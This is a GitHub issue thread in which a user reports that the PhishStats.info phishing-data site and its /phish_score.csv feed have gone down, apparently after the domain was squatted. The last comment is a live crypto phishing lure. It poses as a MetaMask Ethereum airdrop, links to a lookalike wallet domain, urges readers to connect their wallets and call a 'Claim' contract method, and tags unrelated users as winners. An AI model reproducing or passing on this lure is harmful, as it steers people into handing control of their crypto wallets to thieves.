### ISSUE TITLE
Are you still involved with phishstats.info?

### ISSUE THREAD

**Issue by gurnec** [eschultze/phishstats-api-network#2]
My apologies for bothering you @eschultze if you're not, however I thought you'd like to know that it looks like that domain has been scooped up by a domain squatter a few hours ago. At the very least, the `/phish_score.csv` URL is no longer working.

Please disregard if I have the wrong person!

**Comment by gurnec** [comment]
For anyone following this issue, PhishStats.info is apparently back from the dead!

**Comment by gurnec** [comment]
I'm reopening this because PhishStats.info has been effectively down since roughly Friday. The `/phish_score.csv` URL has been returning an empty list, and the dashboard hasn't reported any new URLs since then.

**Comment by mesidharth** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @joekr, @chibicode, @Omar12, @Ghost304, @zmzhang, @nneufeld, @girishbin
